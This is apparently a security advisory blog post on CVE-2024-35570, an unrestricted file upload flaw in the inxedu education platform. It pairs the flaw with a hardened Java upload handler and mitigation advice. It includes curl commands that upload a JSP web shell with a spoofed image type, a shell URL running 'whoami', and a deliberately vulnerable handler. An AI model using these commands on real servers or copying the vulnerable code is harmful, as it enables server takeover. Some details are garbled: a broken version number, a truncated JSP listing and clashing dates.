In June 2024, a critical security vulnerability identified as CVE-2024-35570 was uncovered in the open-source education platform inxedu v2..6. This bug involves an insecure file upload feature in the \controller\ImageUploadController.class component, allowing attackers to upload malicious files to the server. If successfully exploited, this flaw enables remote attackers to execute arbitrary code on the server, threatening the security of your web platform, data, and users.
This post will break down the vulnerability, explain how attackers can exploit it, and provide mitigation tips.
What is CVE-2024-35570?
CVE-2024-35570 is an _arbitrary file upload vulnerability_ in inxedu’s ImageUploadController. The vulnerability allows users to upload any file type—including server-executable files like .jsp. There are no proper checks in place to restrict file types or verify file contents. If exploited, an attacker could upload a malicious JSP web shell and gain remote code execution capability on your server.
Why is this Dangerous?
File upload vulnerabilities are among the most impactful security bugs. If an attacker can upload web shells or other code files, they typically can:
- Pivot to attack further systems
With inxedu often deployed on educational or public-facing servers, this risk is magnified.
The Vulnerable Functionality
ImageUploadController.class manages image uploads for the application. However, it does not properly check:
- MIME type
- File structure/content
This allows uploads of any type of file—including JSP scripts that the server may execute.
Upload endpoint (placeholder host as used throughout this post):

`http://target-site.com/path/to/ImageUploadController`

JSP fragment (only this partial listing appears on the page):

```jsp
<%@ page import="java.io.*"%>
<%
}
%>
```

Upload with curl:

```bash
curl -F "file=@shell.jsp" http://target-site.com/path/to/upload
```

Because the file is stored under the web root, it is then reachable at:

`http://target-site.com/uploads/shell.jsp?cmd=whoami`

Example Request (using curl)

```bash
curl -X POST -F "upload=@shell.jsp;type=image/jpeg" http://target-site.com/path/to/ImageUploadController
```
Reference Links
- NVD CVE-2024-35570 Entry
- inxedu Official GitHub
- OWASP - Unrestricted File Upload
Simplified view of the vulnerable inxedu upload handler:

```java
import java.io.File;
import javax.servlet.http.HttpServletRequest;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.multipart.MultipartFile;

@RequestMapping("/upload")
public void upload(@RequestParam("file") MultipartFile file, HttpServletRequest request) throws Exception {
    String uploadPath = "/uploads/";                 // directory inside the served web root
    String fileName = file.getOriginalFilename();    // client-controlled name, used verbatim
    File dest = new File(uploadPath + fileName);     // no extension, MIME or content check
    file.transferTo(dest);                           // a .jsp lands where the container executes it
}
```
What’s missing? File extension and content checks!
Store Uploads Outside Web Root
If that is not possible, make sure executable files are never stored under /uploads.
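A hardened counterpart to the handler above, written for this post rather than taken from inxedu, that applies the three missing controls: an extension allowlist, a magic-byte content check that ignores the client's Content-Type, and a server-generated filename written to a directory outside the web root. The class name, the `/var/lib/inxedu/uploads` storage path and the size limit are assumptions.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.*;
import java.util.Set;
import java.util.UUID;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;

@RestController
public class HardenedImageUploadController {
    // Hypothetical storage directory outside the servlet container's web root,
    // so the container never serves, let alone executes, anything written here.
    private static final Path STORAGE_DIR = Paths.get("/var/lib/inxedu/uploads").toAbsolutePath().normalize();
    private static final Set<String> ALLOWED_EXT = Set.of("png", "jpg", "jpeg");
    private static final long MAX_BYTES = 5L * 1024 * 1024; // assumed limit
    @PostMapping("/upload")
    public String upload(@RequestParam("file") MultipartFile file) throws IOException {
        if (file.isEmpty() || file.getSize() > MAX_BYTES) {
            throw new IllegalArgumentException("empty or oversized upload");
        }
        // 1. Extension allowlist on the part after the LAST dot, so "shell.jsp"
        //    and "shell.jpg.jsp" are both rejected.
        String name = file.getOriginalFilename() == null ? "" : file.getOriginalFilename();
        int dot = name.lastIndexOf('.');
        String ext = dot < 0 ? "" : name.substring(dot + 1).toLowerCase();
        if (!ALLOWED_EXT.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed");
        }
        // 2. Content check on magic bytes; the client-supplied Content-Type
        //    (e.g. "type=image/jpeg" in the curl request above) is never trusted.
        byte[] head = new byte[4];
        try (InputStream in = file.getInputStream()) {
            if (in.read(head) < 4 || !looksLikeImage(head)) {
                throw new IllegalArgumentException("content is not a supported image");
            }
        }
        // 3. Server-generated filename: the client's name never reaches the filesystem.
        Path dest = STORAGE_DIR.resolve(UUID.randomUUID() + "." + ext);
        Files.createDirectories(STORAGE_DIR);
        try (InputStream in = file.getInputStream()) {
            Files.copy(in, dest, StandardCopyOption.REPLACE_EXISTING);
        }
        return dest.getFileName().toString(); // handed to a non-executing download route
    }
    static boolean looksLikeImage(byte[] h) {
        boolean png = (h[0] & 0xFF) == 0x89 && h[1] == 'P' && h[2] == 'N' && h[3] == 'G';
        boolean jpeg = (h[0] & 0xFF) == 0xFF && (h[1] & 0xFF) == 0xD8 && (h[2] & 0xFF) == 0xFF;
        return png || jpeg;
    }
}
```

With this in place, the `shell.jsp;type=image/jpeg` request from the example above fails at step 1 and, even with a renamed file, at step 2.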
Upgrade inxedu
Keep your software updated. Follow inxedu’s security releases.
Conclusion
CVE-2024-35570 highlights the severe danger of improperly validated file uploads. If you run inxedu v2..6, patch immediately and harden your upload handling code. Arbitrary file upload bugs are straightforward to exploit and devastating in impact—but they’re also preventable with secure programming and regular updates!
Stay safe—lock down your file uploads.
*Exclusive for this post. If you have questions, contact the inxedu maintainers or review the NVD listing.*
Timeline
Published on: 05/23/2024 19:16:01 UTC
Last modified on: 08/26/2024 16:35:08 UTC